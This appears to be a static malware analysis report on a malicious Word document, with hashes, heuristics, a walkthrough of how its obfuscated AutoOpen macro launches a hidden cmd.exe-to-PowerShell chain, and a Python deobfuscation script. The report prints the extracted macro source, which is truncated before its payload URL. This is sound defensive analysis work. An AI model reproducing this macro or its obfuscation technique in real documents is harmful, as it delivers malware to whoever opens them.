Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6deeaa4b82b75ea1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 107.8 KB
Created: 2018-06-05 15:12:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: b24ebb229d5abeabe9882b695f9f9afa
SHA-1: 645da2940767d804fa461705f1d25ef0cc9ac955
SHA-256: 6deeaa4b82b75ea137eb1ccaab3deee2e3e8c2fdcf28a3ed536c39fb7e4c3541
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample carries a VBA project whose document module (VB_Name "mBHNtDr", VB_Base "1Normal.ThisDocument") defines Sub Autoopen(), so the code runs as soon as the document is opened with macros enabled. Autoopen calls EQqnOnMBHwr(), which passes a concatenated string to Shell() with a window style of 79691 - 79691 = 0 (vbHide), so the child process starts with no visible window. Every function is padded with junk arithmetic (Hex, Cos, CDate over variables that are never assigned and therefore Empty, which arithmetic treats as 0) under On Error Resume Next; the same rule turns the unassigned Chr() operands into 0, so the Shell() argument begins with Chr(vbKeyC) = "C". The string fragments returned by iKfVI() and kUHNorY() then spell out the rest of the command line: "cmd <junk> & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set ...", a caret-obfuscated cmd.exe chain that stores one or two letters per environment variable (set %RGmTJitEd%=p, set %aKjQChliTiwpzZ%=o^w, set %IzCcMFBIMsZvY%=e^r, ...) and reassembles them with delayed expansion (!%ODXsRTvRsj%!!%UNmWuQSjvFajz%!...) into "powershell -e <base64>". The base64 is UTF-16LE text; its visible prefix decodes to "(nEW-objEcT  SySTem.Io.COmprESsIon.dEflaTEStREaM([sYstEm.iO", the start of an expression that wraps a stream in a Deflate decompressor. The remainder of the encoded command, and therefore any URL it contacts, lies beyond the truncated preview; the usual purpose of such a stub is to inflate and run an embedded second-stage script that downloads and executes a payload, but that is not confirmed by what is visible here. The critical OLE_VBA_SHELL heuristic therefore fires for a concrete reason: the macro exists only to launch a hidden cmd.exe -> powershell.exe chain.
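As an added worked example, not part of the original report or of the analysis tool, the script below replays the cmd.exe trick the macro relies on and decodes the PowerShell argument. Its input is constructed from the string literals visible in iKfVI() and kUHNorY() in the macro preview further down, concatenated in source order (the return statement of kUHNorY() is past the truncation, so that order is an assumption), with the leading "C" supplied by Chr(vbKeyC). The /c-chain parser and the -e decoder are generic, so they also apply to other samples that use the same delayed-expansion obfuscation.

```python
"""Replay the cmd.exe /V delayed-expansion obfuscation the extracted macro
builds for Shell(), then decode the PowerShell -e (UTF-16LE base64) argument."""
import base64
import re

# Constructed input: the string literals visible in iKfVI() and kUHNorY() of
# the extracted macro, joined in the order the macro concatenates them. The
# leading "C" is Chr(vbKeyC) = Chr(67); the other Chr() operands are never
# assigned, so they evaluate to 0. The encoded PowerShell argument stops
# where the preview is truncated.
OBFUSCATED_CMD = (
    "C"
    "md OWocPlHvMsciw AMOX"
    "ZLHdmMqFlArdajMC zrHZVqqEhPwduZ &     %^c^o^m^S^p^E^c^%     %^c^o^m^S^p^E^c^% "
    "    /V         /c           set %abHShlkMPZfWuUO%=wkKEMWQ&&set %RGmTJitE"
    "d%=p&&set %aKjQChliTiwpzZ%=o^w&&set %zpRnhuwtcraRBSO%=RLnbhtzvVqf&&set %"
    "ODXsRTvRsj%=!%RGmTJitEd%!&&set %RLSpMDLHc"
    "QzCRSj%=fTDMikG&&set %IzCcMFBIMsZvY%=e^r&&set %UNmWuQSjvFajz%=!%aKjQC"
    "hliTiwpzZ%!&&set %FabziGv%=s&&set %ttZuiGqWRrPfhJB%=OqKlOTJVJ&&set %GSkrr"
    "PlSbGMcA%=he&&set %rbQuZCXXdlN%=ll&&!%ODXsRTv"
    "Rsj%!!%UNmWuQSjvFajz%!!%IzCcMFBIMsZvY%!!%FabziGv%!!%GSkrrPlSbGMcA"
    "%!!%rbQuZCXXdlN%!  -e KABuAEUAVwAtAG8AYgBqAEUAYwBUACAAIABTAHkAUwBUAGUAbQ"
    "AuAEkAbwAuAEMAbwBtAHAAcgBFAFMAcwBJAG8AbgAuAGQA"
    "RQBmAGwAYQBUAEUAUwB0AFIARQBhAE0AKABbAHMAWQBzAHQARQBtAC4AaQBP"
)

# `set %name%=value` stage; the percent signs become part of the variable name
SET_RE = re.compile(r"^\s*set\s+(%[^%=]+%)=(.*)$", re.IGNORECASE)
# `!%name%!` delayed-expansion read of such a variable
DELAYED_RE = re.compile(r"!(%[^%!]+%)!")


def expand_delayed(text, env):
    """Expand !name! references (cmd /V delayed expansion) from env."""
    return DELAYED_RE.sub(lambda m: env.get(m.group(1), m.group(0)), text)


def decode_encoded_command(command):
    """Decode a `powershell -e <base64>` argument: base64 of UTF-16LE text.
    A truncated blob can end on half a code unit; that dangling byte is dropped."""
    m = re.search(r"-e\w*\s+([A-Za-z0-9+/=]+)", command, re.IGNORECASE)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def deobfuscate(cmdline):
    """Return the launcher, the variables the set-chain defines, the command it
    finally runs, and the decoded -EncodedCommand payload (None if absent).

    cmd.exe drops ^ escapes when it parses a line, and in a /c command line an
    undefined %name% stays literal, so `set %name%=value` defines a variable
    whose name includes the percent signs; with /V, !%name%! reads it back
    when that && stage executes. Replaying the stages in order recovers the
    real command."""
    m = re.search(r"\s/c\s", cmdline, re.IGNORECASE)
    if not m:
        raise ValueError("no cmd /c command line found")
    launcher = cmdline[: m.start()].replace("^", "").strip()
    env, command = {}, None
    for stage in cmdline[m.end():].split("&&"):
        stage = stage.replace("^", "")
        assignment = SET_RE.match(stage)
        if assignment:
            env[assignment.group(1)] = expand_delayed(assignment.group(2), env)
        else:
            command = expand_delayed(stage, env).strip()
    return {
        "launcher": launcher,
        "env": env,
        "command": command,
        "decoded": decode_encoded_command(command) if command else None,
    }


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED_CMD)
    print("launcher:", result["launcher"])
    print("command :", result["command"][:40], "...")
    print("decoded :", result["decoded"])
```

Running it prints the caret-stripped launcher (cmd with junk arguments, then %comSpEc% %comSpEc% /V), the reassembled "powershell  -e ..." command and the decoded UTF-16LE prefix. Because the preview is truncated the decoded text stops mid-expression: the 39 complete base64 groups yield 117 bytes, and the dangling final byte is dropped rather than decoded as garbage.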

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The recovered macro source calls Shell(), which starts an external process; here it launches the obfuscated cmd.exe command line assembled by iKfVI() and kUHNorY().
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The macro defines an AutoOpen entry point (Sub Autoopen()), which Word runs automatically when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (see Extracted artifacts), so the finding is redundant with OLE_VBA_AUTOOPEN.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into embedded drawing parts, not a network indicator: nothing contacts it at runtime, and it should not be treated as C2 or a download location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11626 bytes
SHA-256: a2f29107f6ac9687700f493d7d5685998479a9f78762d7d625d2b903727216de

Preview: first 1,000 lines of the extracted script (the listing stops at the truncation marker below)
Attribute VB_Name = "mBHNtDr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQqnOnMBHwr()
On Error Resume Next
DirMs = Hex(RPQWiA + Hex(cUFPc) * 19848 + Round(NwrRZ))
qVfKs = Cos(PVYApZ)
FEadjY = CDate(hUbqV)
aSBFn = Cos(nYHvjF)
DltDUQ = Hex(pFSnUH + Hex(XnVupo) * 34933 + Round(zTTMP))
NzIrXF = Cos(QoQGZ)
kVzOkj = CDate(PllBtQ)
znZkH = Cos(CbHJw)
EQqnOnMBHwr = oOvDZiYA + Shell(uqwzWHNa + Chr(vYJHbsFsVj + vbKeyC + KjzRzmFo) + iKfVI + kUHNorY + EKoOwGiXbN + TRwZZsUzjk + MDFzo + sEDRqjv, 79691 - 79691)
BXHzFn = Hex(IikzF + Hex(jhXcLH) * 94567 + Round(tXcOf))
YdINqS = Cos(fKImjN)
IdNpTC = CDate(TfzwBw)
HzikZo = Cos(faWHnu)
End Function
Sub Autoopen()
On Error Resume Next
XOqfu = Hex(zPJnu + Hex(YFzIRo) * 37338 + Round(XKdBGZ))
cDrijH = Cos(wQIRH)
qspqpv = CDate(mhRFT)
viMkp = Cos(UjWLS)
EQqnOnMBHwr
OVzIh = Hex(AjnIf + Hex(mMLKA) * 91772 + Round(mOMMvj))
TsmzTj = Cos(lbZQd)
QEmjm = CDate(rwdMKf)
ZjqBJD = Cos(BhHuo)
End Sub


Attribute VB_Name = "zzBkltXvVhcjZ"
Function iKfVI()
On Error Resume Next
qTbSd = Hex(jFZwnI + Hex(BmujLC) * 75109 + Round(tdFpWY))
rZkDlj = Cos(WuzOS)
bkFaFM = CDate(zUmzT)
CwqWd = Cos(YhOzM)
vTwFGawUu = "md OWocPl" + "HvMsciw" + " AM" + "OX"
WwlPzh = Hex(koWJYi + Hex(JOzXnm) * 70307 + Round(dTjYW))
tQNks = Cos(iQXjUF)
jhjnR = CDate(twJirM)
wHSSjb = Cos(oqXJY)
XsAaoWZH = "ZLHdmMqFlAr" + "dajMC zrHZV" + "qqEhPwduZ " + "&     %^c^o^" + "m^S^p^E^" + "c^%     %^c" + "^o^m^S^p^E^c" + "^% "
mAtrPC = Hex(kBhzjP + Hex(cLjiWY) * 35548 + Round(bzFAsu))
sKXOk = Cos(sDSTo)
pzZVmU = CDate(icGomA)
tYvmO = Cos(nXIWa)
lYVlWFWaR = "    /V " + "   " + "     /" + "c   " + "        set %ab" + "HShlkMPZfWuUO%" + "=wkKEMWQ&&s" + "et %RGmTJitE"
ickIR = Hex(itdvC + Hex(SjzLkm) * 42037 + Round(OXKTHj))
irRoC = Cos(UpSwUp)
EGkzWT = CDate(iMbnW)
pDGRQ = Cos(lJDCL)
KkSmE = "d%" + "=p&&set %aKjQ" + "ChliTiwpzZ%" + "=o^w&&" + "set %zpRnh" + "uwtcraRB" + "SO%=RLnbh" + "tzvVqf&&set %"
zhwqi = Hex(PwvfH + Hex(MwoMWR) * 30698 + Round(SBERiB))
TEQAEZ = Cos(WlVrhN)
ZFKvU = CDate(TMYmm)
howcjH = Cos(fvsifD)
pMjGR = "ODXsRTvRsj%=!" + "%RGmTJitEd%!" + "&&set %RLSpMD" + "LHc"
WZCrf = Hex(CFswuW + Hex(wOHfi) * 27639 + Round(sCYJo))
Eichai = Cos(HitKhH)
kbvBh = CDate(tjRoM)
RlVUA = Cos(DvfUcL)
GdKCDmL = "QzCRSj%=fTDMik" + "G&&" + "set" + " %IzCcMFBIMs" + "ZvY%=e^r&" + "&set %UNmWuQSj" + "vFajz%" + "=!%aKjQC"
QiHOU = Hex(wWMiQG + Hex(bdqYQ) * 77401 + Round(aNGmO))
RdLWQw = Cos(jRjlRw)
OdEDEN = CDate(QZEHDo)
vCYVAc = Cos(ULpRRW)
ZPXEGnmrqq = "hliTiwpzZ%!&&s" + "et %Fabz" + "iGv%=s&&set" + " %ttZ" + "uiGqWRrP" + "fhJB%=OqKlOTJ" + "VJ&&set %GS" + "krr"
iKfVI = vTwFGawUu + XsAaoWZH + lYVlWFWaR + KkSmE + pMjGR + GdKCDmL + ZPXEGnmrqq
End Function
Function kUHNorY()
On Error Resume Next
KwFGTw = Hex(wIChA + Hex(ADGPM) * 19083 + Round(lOIQRU))
tSPlm = Cos(nGczAk)
kwtVnz = CDate(dQEaF)
dFvoo = Cos(wjNdtR)
KCUnYjwXYlB = "PlSb" + "GMc" + "A%=he&&set %r" + "bQuZCXXdlN%=ll&" + "&!%ODXsRTv"
JbuaHO = Hex(RHmUmc + Hex(HjcOp) * 61421 + Round(NhKoLL))
IXVADs = Cos(ljqwLc)
VTbBLY = CDate(AlPElP)
tkmwDq = Cos(kRUjk)
fkGsU = "Rsj%!!%UNm" + "WuQSjvFajz%!!" + "%IzCcMFBIMs" + "ZvY%!!%Fabzi" + "Gv%!!%GSkrrP" + "lSbGMcA"
VzmRdC = Hex(sOjmzm + Hex(ImFvRd) * 90701 + Round(zDAHmh))
CGSbzV = Cos(wzaib)
iBAwQ = CDate(AzLYRG)
dAiQWQ = Cos(GMcTX)
wWICp = "%!!%r" + "bQuZ" + "CXXdlN%!  -e" + " KABuAEUAVwAtA" + "G8AYgBqAEUAY" + "wBUACAAIABTAHk" + "AUwBUAGUAbQ"
ZHnHVj = Hex(rNwCD + Hex(phnqhB) * 39938 + Round(sAQhD))
UwSYj = Cos(bXsKD)
iEnPC = CDate(MjbZTV)
SCWhHX = Cos(RRivvZ)
oWVhFVkSPC = "AuAE" + "kAbwAu" + "AEMAbwBtAHAAcgB" + "FAFMAcwBJ" + "AG8AbgAuAG" + "QA"
iOSpc = Hex(iTPicw + Hex(UXqudw) * 57286 + Round(WEplm))
mQWsUc = Cos(iRIkq)
QznsEI = CDate(FtanRw)
IIJcDq = Cos(sCtlH)
jjFhLIG = "RQBmAGwAYQ" + "BUAE" + "UAUwB0AFIARQB" + "hAE0AKABbA" + "HMAW" + "QBzAHQAR" + "QBtAC4AaQBP
... (truncated)